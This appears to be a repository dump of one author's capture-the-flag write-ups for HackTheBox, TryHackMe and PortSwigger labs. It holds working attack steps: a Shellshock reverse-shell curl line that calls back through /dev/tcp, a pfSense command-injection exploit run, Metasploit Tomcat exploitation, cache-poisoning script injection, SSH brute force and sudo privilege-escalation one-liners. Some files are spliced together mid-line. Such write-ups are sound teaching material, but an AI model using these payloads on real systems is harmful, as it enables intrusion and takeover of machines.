/bin/sh: can't access tty; job control turned off 101 | $ python -c "import pty; pty.spawn('/bin/bash')" 102 | www-data@popcorn:/$ su - firefart 103 | su - firefart 104 | Password: 105 | 106 | firefart@popcorn:~# ls 107 | ls 108 | root.txt 109 | ``` -------------------------------------------------------------------------------- /HackTheBox/EZ/sense.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - nmap 3 | ``` 4 | 80/tcp open http lighttpd 1.4.35 5 | |_http-server-header: lighttpd/1.4.35 6 | |_http-title: Did not follow redirect to https://sense.htb/ 7 | |_https-redirect: ERROR: Script execution failed (use -d to debug) 8 | 443/tcp open ssl/https? 9 | |_ssl-date: TLS randomness does not represent time 10 | ``` 11 | - linux like os -> ping ttl 12 | - http://sense.htb give me an error -> 13 | ``` 14 | Potential DNS Rebind attack detected, see http://en.wikipedia.org/wiki/DNS_rebinding 15 | Try accessing the router by IP address instead of by hostname. 16 | ``` 17 | - 200 with login page went access web page by entering IP addr 18 | - /index.php :PF Sense login page 19 | - defualt admin didnt works [link](https://pfsense-docs.readthedocs.io/en/latest/usermanager/pfsense-default-username-and-password.html) 20 | - /index.html : dragonfly bsd 21 | 22 | ## gobuster 23 | I use to wordlist this time, the first one I use for big.txt but I didnt get any good hit, I then try with the lowercase meddium and yea I got good hint on 2 .txt files 24 | ```console 25 | $ gobuster dir -u https://10.10.10.60/ -x txt,php,html -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 54 -k 26 | 27 | /classes (Status: 301) 28 | /css (Status: 301) 29 | /edit.php (Status: 200) 30 | /exec.php (Status: 200) 31 | /favicon.ico (Status: 200) 32 | /graph.php (Status: 200) 33 | /help.php (Status: 200) 34 | /includes (Status: 301) 35 | /index.php (Status: 200) 36 | /index.html (Status: 200) 37 | /installer (Status: 301) 38 | /interfaces.php (Status: 200) 39 | /javascript (Status: 301) 40 | /license.php (Status: 200) 41 | /pkg.php (Status: 200) 42 | /stats.php (Status: 200) 43 | /status.php (Status: 200) 44 | /system.php (Status: 200) 45 | /themes (Status: 301) 46 | /tree (Status: 301) 47 | /widgets (Status: 301) 48 | /wizards (Status: 301) 49 | /wizard.php (Status: 200) 50 | /xmlrpc.php (Status: 200) 51 | /~sys~ (Status: 403) 52 | /changelog.txt 53 | /system-users.txt 54 | ``` 55 | - /changelog.txt 56 | ``` 57 | # Security Changelog 58 | 59 | ### Issue 60 | There was a failure in updating the firewall. Manual patching is therefore required 61 | 62 | ### Mitigated 63 | 2 of 3 vulnerabilities have been patched. 64 | 65 | ### Timeline 66 | The remaining patches will be installed during the next maintenance window 67 | ``` 68 | okey so 1 vulnerability still exist. 69 | 70 | - /system-users.txt 71 | ``` 72 | ####Support ticket### 73 | 74 | Please create the following user 75 | 76 | 77 | username: Rohit 78 | password: company defaults 79 | ``` 80 | so we get the cresential... but password? company defaults??? I guess it is the defualt password for pf sense which we found in the link above. now try to login with **rohit:pfsense** 81 | 82 | 83 | Boom we are in! 84 | -systeminfo 85 | ``` 86 | 2.1.3-RELEASE (amd64) 87 | built on Thu May 01 15:52:13 EDT 2014 88 | FreeBSD 8.3-RELEASE-p16 89 | ``` 90 | As we are already know from `/changelog.txt`. there is a serious vuln on the firewall which is not patch yet, so let google and find out. 91 | 92 | 93 | after some googling, I found exploit this version. [link](https://www.exploit-db.com/exploits/43560). so let use searchsploit to get the exploit script and lunch our attack 94 | ``` 95 | kali@kali:~/HTB/sense$ searchsploit pfSense 2.1.4 96 | --------------------------------------------------------------- --------------------------------- 97 | Exploit Title | Path 98 | --------------------------------------------------------------- --------------------------------- 99 | pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py 100 | --------------------------------------------------------------- --------------------------------- 101 | Shellcodes: No Results 102 | kali@kali:~/HTB/sense$ searchsploit -m php/webapps/43560.py 103 | Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection 104 | URL: https://www.exploit-db.com/exploits/43560 105 | Path: /usr/share/exploitdb/exploits/php/webapps/43560.py 106 | File Type: Python script, ASCII text executable, with CRLF line terminators 107 | 108 | Copied to: /home/kali/HTB/sense/43560.py 109 | ``` 110 | let check the exploit script 111 | ``` 112 | kali@kali:~/HTB/sense$ python3 43560.py -h 113 | usage: 43560.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT] [--username USERNAME] 114 | [--password PASSWORD] 115 | 116 | optional arguments: 117 | -h, --help show this help message and exit 118 | --rhost RHOST Remote Host 119 | --lhost LHOST Local Host listener 120 | --lport LPORT Local Port listener 121 | --username USERNAME pfsense Username 122 | --password PASSWORD pfsense Password 123 | ``` 124 | okey let run it 125 | ``` 126 | kali@kali:~/HTB/sense$ python3 43560.py --rhost 10.10.10.60 --lhost tun0 --lport 6969 --username rohit --password pfsense 127 | CSRF token obtained 128 | Running exploit... 129 | Exploit completed 130 | ``` 131 | boom we got shell....... AS ROOT!!! 132 | 133 | 134 | go grab flags, GLHF -------------------------------------------------------------------------------- /HackTheBox/EZ/shocky.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 3 | - 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 4 | 2222 -> rabbit hole... 5 | 6 | ## gobuster 7 | - / 8 | ``` 9 | /cgi-bin/ (Status: 403) 10 | /cgi-bin/.html (Status: 403) 11 | /index.html (Status: 200) 12 | /server-status (Status: 403) 13 | ``` 14 | - /cgi-bin/ since it is a linux then looking for .sh 15 | ``` 16 | user.sh 17 | ``` 18 | when GET / -> return 19 | ``` 20 | 21 | Content-Type: text/plain 22 | 23 | Just an uptime test script 24 | 25 | 10:15:49 up 1:05, 0 users, load average: 0.00, 0.00, 0.00 26 | ``` 27 | shocker??? -> shell shock. 28 | 29 | looking at this 30 | - https://github.com/s4n7h0/NSE/blob/master/http-shellshock.nse 31 | - https://book.hacktricks.xyz/pentesting/pentesting-web/cgi#shellshock 32 | 33 | try it out. 34 | ``` 35 | kali@kali:~/HTB/shocker$ curl -H 'User-Agent: () { :; }; echo; echo "VULNERABLE TO SHELLSHOCK"' http://shocker.htb/cgi-bin/user.sh 2>/dev/null 36 | VULNERABLE TO SHELLSHOCK 37 | 38 | Content-Type: text/plain 39 | 40 | Just an uptime test script 41 | 42 | 10:15:49 up 1:05, 0 users, load average: 0.00, 0.00, 0.00 43 | ``` 44 | 45 | # foot hold 46 | 47 | the victim server is vulnerable to shell shock. so let try to craft a bash reverse shell 48 | 49 | ``` 50 | kali@kali:~/HTB/shocker$ curl -H 'User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.10.14.8/6969 0>&1' http://shocker.htb/cgi-bin/user.sh 2>/dev/null 51 | ``` 52 | nc listen to port 6969 53 | ``` 54 | kali@kali:~/HTB/shocker$ nc -nlvp 6969 55 | listening on [any] 6969 ... 56 | connect to [10.10.14.8] from (UNKNOWN) [10.10.10.56] 33820 57 | bash: no job control in this shell 58 | shelly@Shocker:/usr/lib/cgi-bin$ 59 | ``` 60 | go grab user flag 61 | 62 | # root 63 | 64 | run `linpeas.sh` 65 | ``` 66 | [+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d 67 | [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid 68 | Matching Defaults entries for shelly on Shocker: 69 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 70 | 71 | User shelly may run the following commands on Shocker: 72 | (root) NOPASSWD: /usr/bin/perl 73 | ``` 74 | 75 | **GTFObin**: sudo perl -e 'exec "/bin/bash";' 76 | 77 | ``` 78 | shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/bash";' 79 | sudo perl -e 'exec "/bin/bash";' 80 | root@Shocker:/home/shelly# whoami 81 | whoami 82 | root 83 | ``` 84 | go grab root flag. -------------------------------------------------------------------------------- /HackTheBox/EZ/swagshop.md: -------------------------------------------------------------------------------- 1 | # recon 2 | ## nmap 3 | - 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 4 | - 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 5 | 6 | ## 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 7 | - gobuster 8 | ``` 9 | /app (Status: 301) 10 | /api.php (Status: 200) 11 | /cron.php (Status: 200) 12 | /errors (Status: 301) 13 | /favicon.ico (Status: 200) 14 | /includes (Status: 301) 15 | /index.php (Status: 200) 16 | /install.php (Status: 200) 17 | /js (Status: 301) 18 | /lib (Status: 301) 19 | /media (Status: 301) 20 | /pkginfo (Status: 301) 21 | /server-status (Status: 403) 22 | /shell (Status: 301) 23 | /skin (Status: 301) 24 | /var (Status: 301) 25 | 26 | ``` 27 | - about us 28 | ``` 29 | To all of you, from all of us at Magento Store - Thank you and Happy eCommerce! 30 | 31 | John Doe 32 | Some important guy 33 | ``` 34 | - /js/ : `SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js` 35 | - /install.php : `FAILED ERROR: Magento is already installed ` 36 | - /shell 37 | ``` 38 | [ ] abstract.php 2014-05-07 14:58 5.5K 39 | [ ] compiler.php 2014-05-07 14:58 4.3K 40 | [ ] indexer.php 2014-05-07 14:58 8.0K 41 | [ ] log.php 2014-05-07 14:58 5.8K 42 | ``` 43 | - /errors 44 | ``` 45 | [ ] 404.php 2014-05-07 14:58 1.0K 46 | [ ] 503.php 2014-05-07 14:58 1.0K 47 | [DIR] default/ 2014-05-07 14:58 - 48 | [ ] design.xml 2014-05-07 14:58 1.0K 49 | [ ] local.xml.sample 2014-05-07 14:58 1.6K 50 | [ ] processor.php 2014-05-07 14:58 16K 51 | [ ] report.php 2014-05-07 14:58 1.1K 52 | ``` 53 | - /includes/ : config.php 54 | - **/lib/Magento/Db/Sql** 55 | - /index.php/admin : admin page 56 | 57 | 58 | 59 | ## foot hold 60 | from searchsploit I found an interesting exploit `Magento eCommerce - Remote Code Execution`. run `searchsploit -x 33 | ``` 34 | 35 | ``` 36 | POST /forgot-password HTTP/1.1 37 | Host: ac051fe31fa115bd809f1db800380059.web-security-academy.net:'click here to login with your new password: pUFVxOIq1g

Thanks,
Support team

This email has been scanned by the MacCarthy Email Security service 42 | ``` 43 | 44 | no way, I logged into the server with carlos but wasn't done taking note, and do more experiment.... can we redo the lab? 45 | 46 | # web cache poisoning 47 | I read in guideline on the PortSwigger, It is not to hard to understand how it works but I learn more when I listen so I youtube a bit on how web cache poisoning works. I couldn't make the extension works so I just try to add different header and end up with `HOST` 48 | ``` 49 | GET / HTTP/1.1 50 | Host: ac971f5a1fb39ab7807d059500930022.web-security-academy.net 51 | Host: kuro.net 52 | ``` 53 | an it seem like it works. line 19 in http response 54 | ```html 55 | ` but it didn't work. it end up like this 58 | ```html 59 | 61 | /resources/js/tracking.js"> 62 | 63 | ``` 64 | and ofc it didnt work, we even mess up the web. So I was thinking that what if I crate a server which `kurohat.net/resources/js/tracking.js` with the content `alert(document.cookie)` then it should works since the web page will load my malicious page on ``kurohat.net/resources/js/tracking.js` 65 | 66 | 67 | Instead of using our own website, we can use exploit server that the lab offering instead. create a page `/resources/js/tracking.js` with content `alert(document.cookie)` then click *store*. now copy the link and insert it as our 2nd `host` header. Use repeater to send our request util you get response with `Age: 0`. Try to visit the page, If you get an alert then we are good!! 68 | 69 | 70 | # Host header authentication bypass 71 | ``` 72 | This lab makes an assumption about the privilege level of the user based on the HTTP Host header. 73 | 74 | To solve the lab, access the admin panel and delete Carlos's account. 75 | ``` 76 | I assume that the admin page is at `/admin` and luckily I got it right! I send it to *Repeater* I tried to add like `X-Forwarded-For`/ `X-Forwarded-Host: localhost`. but it didnt work. I the just remove the original `host` parameter and replace it with localhost and boom, it work!! Now open it on web browser and click delete Carlos's account -> send it to *burp* and again replace the original host with localhost 77 | 78 | # Routing-based SSRF 79 | ``` 80 | This lab is vulnerable to routing-based SSRF via the Host header. You can exploit this to access an insecure intranet admin panel located on an internal IP address. 81 | 82 | To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos 83 | ``` 84 | to create payload, run 85 | ```zsh 86 | $ python3 -c "for i in range (0,256): print(i);" > subnet.txt 87 | ``` 88 | I tried, you need Burp PRO (Burp Collaborator) to solve this! 89 | 90 | # SSRF via flawed request parsing 91 | Also need, Burp PRO (Burp Collaborator) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # write up 2 | Just my write up for CTF -------------------------------------------------------------------------------- /TryHackMe/Bounty-hacker.md: -------------------------------------------------------------------------------- 1 | # recon 2 | nmap shows us that there are 3 open ports 3 | - 21/tcp open ftp 4 | - ftp-anon: Anonymous FTP login allowed (FTP code 230) 5 | - 22/tcp open ssh 6 | - 80/tcp open http 7 | - Apache/2.4.18 (Ubuntu) 8 | let run gobuster for directory brute forcing. 9 | ``` 10 | $ gobuster dir -u http://$IP/ -w /usr/share/SecLists/Discovery/Web-Content/big.txt -x .php,.txt,.html -t 54 11 | ``` 12 | in the meanwhile we waiting for gobuster result we can exaiming FTP port. Note that the FTP port is open for `Anonymous` login. what do it mean? yes, we can log in to FTP using `Anonymous` as username and password is not needed! 13 | ``` 14 | $ ftp $IP 15 | ``` 16 | use `ls` to list the file on the ftp. There are 2 files here. To get the file, run: `get `. Get both file to our kali so we can examing it. 17 | 18 | as mention there are 2 files: 19 | 1. locks.txt: this file looks like a password/wordlist. We might be able to use it for brute forcing 20 | 2. task.txt: a to do list wrote by *lin* 21 | 22 | What we have at this point is username=`lin` as passwords in `locks.txt`. Now you can for get about gobuster... we already got something really juicy here. Let get foot hold on the victim server. 23 | 24 | # foothold 25 | now let brute force ssh to get a foot hold on the victim server. We will use hydra to performe ssh brute forcing. If you dont know how hydra works. There is really good room on tryhackme that teaching you how to use hydra. so pls check it out 26 | ```console 27 | $ hydra -f -l lin -P locks.txt $IP -t 64 ssh 28 | ``` 29 | Boom ! we got the password. now ssh to the victim server and go grab the user flag. 30 | 31 | # root 32 | we will start with checking what Lin allow to run super user by running `sudo -l`. 33 | ```console 34 | lin@bountyhacker:~/Desktop$ sudo -l 35 | [sudo] password for lin: 36 | Matching Defaults entries for lin on bountyhacker: 37 | env_reset, mail_badpass, 38 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 39 | 40 | User lin may run the following commands on bountyhacker: 41 | (root) /bin/tar 42 | ``` 43 | As you see, we are allow to use run `tar` as root. When you see this, the first think need to do is visit `GTFObins` ([link](https://gtfobins.github.io/)) and search for tar (link [here](https://gtfobins.github.io/gtfobins/tar/)) you can go script kiddez style and copy and paste the code under `#sudo` to gain root or read more about how it works by do more research about it. 44 | 45 | anyhow, here is what we do. 46 | ```console 47 | lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh 48 | tar: Removing leading `/' from member names 49 | # whoami 50 | root 51 | # cat /root/root.txt 52 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber/day16.py: -------------------------------------------------------------------------------- 1 | # Day File Confusion, create by gu2rks 2 | import sys 3 | import os 4 | import zipfile 5 | import exiftool 6 | 7 | def task1(): 8 | """ 9 | How many files did you extract(excluding all the .zip files) 10 | """ 11 | # get all files 12 | files = os.listdir('./final-final-compressed') 13 | for file in files: 14 | # now unzip it 15 | with zipfile.ZipFile('./final-final-compressed/'+file, 'r') as zip_ref: 16 | zip_ref.extractall('./extracted') 17 | # get all files agains 18 | extracted = os.listdir('./extracted') 19 | print('Extracted %s files' % len(extracted)) 20 | 21 | def task2(): 22 | """ 23 | How many files contain Version: 1.1 in their metadata? 24 | Note: move this scrip inside ./extracted 25 | lookingfor = {'SourceFile': '4jGg.txt', 'ExifTool:ExifToolVersion': 11.94, 'File:FileName': '4jGg.txt', 26 | 'File:Directory': '.', 'File:FileSize': 2844, 'File:FileModifyDate': '2020:05:13 22:02:50-04:00', 27 | 'File:FileAccessDate': '2020:05:13 22:39:53-04:00', 'File:FileInodeChangeDate': '2020:05:13 22:02:50-04:00', 28 | 'File:FilePermissions': 644, 'File:FileType': 'MIE', 'File:FileTypeExtension': 'MIE', 'File:MIMEType': 'application/x-mie', 29 | 'XMP:XMPToolkit': 'Image::ExifTool 10.80', 'XMP:Version': 1.1} 30 | """ 31 | count = 0 32 | files = os.listdir('./') # get all files 33 | 34 | with exiftool.ExifTool() as et: # get exiftool 35 | files_metadata = et.get_metadata_batch(files) # get all files metadata 36 | for metadata in files_metadata: # get file metadata one by one 37 | if 'XMP:Version' in metadata: # check if metadata contains 'XMP:Version' 38 | count = count + 1 # if so -> count it 39 | 40 | print('Total Version:1.1 files : %s' %count) 41 | 42 | def task3(): 43 | """ 44 | Which file contains the password? 45 | Note: move this scrip inside ./extracted 46 | password is 'scriptingpass' 47 | """ 48 | files = os.listdir('./') # get all files 49 | for file in files: # get file name one by one 50 | with open(file, 'r', encoding = "ISO-8859-1") as reader: # open it 51 | data = reader.read() # read it 52 | if 'password' in data: # check if it contain password 53 | print(file) # if so -> print out file name 54 | -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/AdventOfCyber/files.zip -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber/final-final-compressed.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/AdventOfCyber/final-final-compressed.zip -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber/getflag.py: -------------------------------------------------------------------------------- 1 | # made by gu2rks@github 2 | import requests 3 | r = requests.get("http://10.10.169.100:3000") 4 | r = r.json() 5 | # {"value":"s","next":"f"} 6 | flag = r["value"] 7 | while True: 8 | r = requests.get("http://10.10.169.100:3000/"+str(r["next"])) 9 | r = r.json() 10 | if r["next"] == "end": 11 | break 12 | flag = flag + r["value"] 13 | 14 | print("the flag: "+ flag) -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day1.md: -------------------------------------------------------------------------------- 1 | - linux server (from ping TTL) 2 | - password length > 5, 3 | - running php. I found out by request for `index.php` -> return 200. index.html -> return 440 4 | 5 | I created an account `kurohat:12345`. There is not much to see/do on the main page, only logout button. I then check dev tool -> cookie 6 | ``` 7 | auth:7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a226b75726f686174227d 8 | ``` 9 | I assume that is a hex/base64 encoded string. let's use CyberChef to understand what the string represent! It turn out that it is a hex. This is the result when I convert it to a uft-8 10 | ``` 11 | {"company":"The Best Festival Company", "username":"kurohat"} 12 | ``` 13 | the plan is change username to santa (`{"company":"The Best Festival Company", "username":"santa"}`). Convert it into hex using CyberChef which will give us 14 | ``` 15 | 7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a2273616e7461227d 16 | ``` 17 | now remove your cookie value and replace it with Santa's cookie -> hit F5 (refresh). BOOM! we are in as Santa 18 | 19 | Active each control to get flags 20 | 21 | # etc 22 | - SatNav = Satellite navigation 23 | - never use poor cookie!!! -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day10.md: -------------------------------------------------------------------------------- 1 | start of with nmap. 2 | ``` 3 | 22/tcp open ssh 4 | 139/tcp open netbios-ssn 5 | 445/tcp open microsoft-ds 6 | ``` 7 | let's use enum4linux to enumerate smb, start with sharelist 8 | ``` 9 | ```console 10 | $ /usr/share/enum4linux/enum4linux.pl -S 10.10.223.29 11 | 12 | ========================================= 13 | | Share Enumeration on 10.10.223.29 | 14 | ========================================= 15 | 16 | Sharename Type Comment 17 | --------- ---- ------- 18 | tbfc-hr Disk tbfc-hr 19 | tbfc-it Disk tbfc-it 20 | tbfc-santa Disk tbfc-santa 21 | IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu)) 22 | ``` 23 | now let's enumerate users 24 | ```console 25 | $ /usr/share/enum4linux/enum4linux.pl -U 10.10.223.29 26 | ============================= 27 | | Users on 10.10.223.29 | 28 | ============================= 29 | index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc: 30 | index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc: 31 | index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc: 32 | ``` 33 | let use nmap (pymap) to enumerate smb and each sharelink to check if any of it allow anonymous login 34 | ```console 35 | $ sudo /opt/pymap.py -t 10.10.223.29 -smb 36 | Host script results: 37 | | smb-enum-shares: 38 | | account_used: guest 39 | | \\10.10.223.29\IPC$: 40 | | Type: STYPE_IPC_HIDDEN 41 | | Comment: IPC Service (tbfc-smb server (Samba, Ubuntu)) 42 | | Users: 1 43 | | Max Users: 44 | | Path: C:\tmp 45 | | Anonymous access: READ/WRITE 46 | | Current user access: READ/WRITE 47 | | \\10.10.223.29\tbfc-hr: 48 | | Type: STYPE_DISKTREE 49 | | Comment: tbfc-hr 50 | | Users: 0 51 | | Max Users: 52 | | Path: C:\shares\tbfc-hr 53 | | Anonymous access: 54 | | Current user access: 55 | | \\10.10.223.29\tbfc-it: 56 | | Type: STYPE_DISKTREE 57 | | Comment: tbfc-it 58 | | Users: 0 59 | | Max Users: 60 | | Path: C:\shares\tbfc-hr 61 | | Anonymous access: 62 | | Current user access: 63 | | \\10.10.223.29\tbfc-santa: 64 | | Type: STYPE_DISKTREE 65 | | Comment: tbfc-santa 66 | | Users: 0 67 | | Max Users: 68 | | Path: C:\shares\tbfc-santa 69 | | Anonymous access: READ/WRITE 70 | |_ Current user access: READ/WRITE 71 | |_smb-enum-users: ERROR: Script execution failed (use -d to debug) 72 | ``` 73 | as you can see, `tbfc-santa` have Anonymous READ/WRITE permission, connect to the share using `smbclient`, no need to enter password since it allows anonymous login 74 | ```console 75 | $ smbclient \\\\10.10.223.29\\tbfc-santa 76 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day11.md: -------------------------------------------------------------------------------- 1 | ssh to the server using `cmnatic:aoc2020`. I will use `suid3num.py` to enumerate suid. I start by checking if the target server have wget and python3 pre-installed. python3 is used when execute `suid3num.py` and wget is use for get `suid3num.py` from our kali 2 | ```console 3 | -bash-4.4$ which python3 4 | /usr/bin/python3 5 | -bash-4.4$ which wget 6 | /usr/bin/wget 7 | ``` 8 | now on kali, run python http server module 9 | ```console 10 | $ python3 -m http.server --cgi 8888 11 | ``` 12 | on target server, use wget to download `suid3num.py`. and run it 13 | ```console 14 | -bash-4.4$ python3 suid3num.py 15 | [#] SUID Binaries in GTFO bins list (Hell Yeah!) 16 | ------------------------------ 17 | /bin/bash -~> https://gtfobins.github.io/gtfobins/bash/#suid 18 | ------------------------------ 19 | 20 | 21 | [$] Please try the command(s) below to exploit harmless SUID bin(s) found !!! 22 | ------------------------------ 23 | [~] /bin/bash -p 24 | ------------------------------ 25 | ``` 26 | now run `/bin/bash -p` to gain root 27 | ```console 28 | -bash-4.4$ /bin/bash -p 29 | bash-4.4# whoami 30 | root 31 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day12.md: -------------------------------------------------------------------------------- 1 | - port scanning 2 | ``` 3 | [+] Port scanning... 4 | 3389/tcp open ms-wbt-server 5 | 8009/tcp open ajp13 6 | 8080/tcp open http-proxy 7 | [+] Enumerating open ports... 8 | 9 | PORT STATE SERVICE VERSION 10 | 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 11 | | ajp-methods: 12 | |_ Supported methods: GET HEAD POST OPTIONS 13 | 14 | 15 | PORT STATE SERVICE VERSION 16 | 8080/tcp open http Apache Tomcat 9.0.17 17 | |_http-favicon: Apache Tomcat 18 | |_http-title: Apache Tomcat/9.0.17 19 | 20 | 21 | PORT STATE SERVICE VERSION 22 | 3389/tcp open ms-wbt-server? 23 | | rdp-ntlm-info: 24 | | Target_Name: TBFC-WEB-01 25 | | NetBIOS_Domain_Name: TBFC-WEB-01 26 | | NetBIOS_Computer_Name: TBFC-WEB-01 27 | | DNS_Domain_Name: tbfc-web-01 28 | | DNS_Computer_Name: tbfc-web-01 29 | | Product_Version: 10.0.17763 30 | |_ System_Time: 2020-12-12T18:34:26+00:00 31 | | ssl-cert: Subject: commonName=tbfc-web-01 32 | | Not valid before: 2020-11-27T01:29:04 33 | |_Not valid after: 2021-05-29T01:29:04 34 | |_ssl-date: 2020-12-12T18:34:27+00:00; +1s from scanner time. 35 | ``` 36 | - cve https://www.trendmicro.com/en_us/research/19/d/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat.html 37 | - http://:8080/cgi-bin/elfwhacker.bat 38 | ```console 39 | msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi-bin/elfwhacker.bat 40 | targeturi => /cgi-bin/elfwhacker.bat 41 | msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run 42 | 43 | [*] Started reverse TCP handler on 10.8.14.151:4444 44 | [*] Executing automatic check (disable AutoCheck to override) 45 | [+] The target is vulnerable. 46 | [*] Command Stager progress - 6.95% done (6999/100668 bytes) 47 | [*] Command Stager progress - 13.91% done (13998/100668 bytes) 48 | [*] Command Stager progress - 20.86% done (20997/100668 bytes) 49 | [*] Command Stager progress - 27.81% done (27996/100668 bytes) 50 | [*] Command Stager progress - 34.76% done (34995/100668 bytes) 51 | [*] Command Stager progress - 41.72% done (41994/100668 bytes) 52 | [*] Command Stager progress - 48.67% done (48993/100668 bytes) 53 | [*] Command Stager progress - 55.62% done (55992/100668 bytes) 54 | [*] Command Stager progress - 62.57% done (62991/100668 bytes) 55 | [*] Command Stager progress - 69.53% done (69990/100668 bytes) 56 | [*] Command Stager progress - 76.48% done (76989/100668 bytes) 57 | [*] Command Stager progress - 83.43% done (83988/100668 bytes) 58 | [*] Command Stager progress - 90.38% done (90987/100668 bytes) 59 | [*] Command Stager progress - 97.34% done (97986/100668 bytes) 60 | [*] Sending stage (176195 bytes) to 10.10.35.81 61 | [*] Command Stager progress - 100.02% done (100692/100668 bytes) 62 | [*] Meterpreter session 1 opened (10.8.14.151:4444 -> 10.10.35.81:49827) at 2020-12-12 13:47:58 -0500 63 | ``` 64 | grab flag 65 | ``` 66 | msf5 post(multi/recon/local_exploit_suggester) > set session 1 67 | session => 1 68 | msf5 post(multi/recon/local_exploit_suggester) > set showdescription true 69 | showdescription => true 70 | msf5 post(multi/recon/local_exploit_suggester) > run 71 | 72 | [*] 10.10.35.81 - Collecting local exploits for x86/windows... 73 | [*] 10.10.35.81 - 34 exploit checks are being tried... 74 | [+] 10.10.35.81 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected! 75 | This module exploits CVE-2020-0787, an arbitrary file move 76 | vulnerability in outdated versions of the Background Intelligent 77 | Transfer Service (BITS), to overwrite 78 | C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL 79 | containing the attacker's payload. To achieve code execution as the 80 | SYSTEM user, the Update Session Orchestrator service is then 81 | started, which will result in the malicious 82 | WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a 83 | DLL hijacking issue within the Update Session Orchestrator Service. 84 | Note that presently this module only works on Windows 10 and Windows 85 | Server 2016 and later as the Update Session Orchestrator Service was 86 | only introduced in Windows 10. Note that only Windows 10 has been 87 | tested, so your mileage may vary on Windows Server 2016 and later. 88 | [+] 10.10.35.81 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. 89 | This module exploits a missing DLL loaded by the 'IKE and AuthIP 90 | Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts 91 | automatically in default installations of Vista-Win8. It requires an 92 | insecure bin path to plant the DLL payload. 93 | [+] 10.10.35.81 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. 94 | Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to 95 | achieve a SYSTEM handle for elevation of privilege. Currently the 96 | module does not spawn as SYSTEM, however once achieving a shell, one 97 | can easily use incognito to impersonate the token. 98 | [*] Post module execution completed 99 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day13.md: -------------------------------------------------------------------------------- 1 | use nmap to scan the server, you will se port 23 TELNET is open. let's connect to it 2 | ```console 3 | $ telnet $IP 4 | Trying 10.10.145.194... 5 | Connected to 10.10.145.194. 6 | Escape character is '^]'. 7 | HI SANTA!!! 8 | 9 | We knew you were coming and we wanted to make 10 | it easy to drop off presents, so we created 11 | an account for you to use. 12 | 13 | Username: santa 14 | Password: clauschristmas 15 | 16 | We left you cookies and milk! 17 | 18 | christmas login: santa 19 | Password: 20 | Last login: Sat Nov 21 20:37:37 UTC 2020 from 10.0.2.2 on pts/2 21 | \ / 22 | -->*<-- 23 | /o\ 24 | /_\_\ 25 | /_/_0_\ 26 | /_o_\_\_\ 27 | /_/_/_/_/o\ 28 | /@\_\_\@\_\_\ 29 | /_/_/O/_/_/_/_\ 30 | /_\_\_\_\_\o\_\_\ 31 | /_/0/_/_/_0_/_/@/_\ 32 | /_\_\_\_\_\_\_\_\_\_\ 33 | /_/o/_/_/@/_/_/o/_/0/_\ 34 | [___] 35 | ``` 36 | 37 | I love John's Xmas tree <3 38 | ```bash 39 | $ cat christmas.sh 40 | #!/bin/bash 41 | trap "tput reset; tput cnorm; exit" 2 42 | clear 43 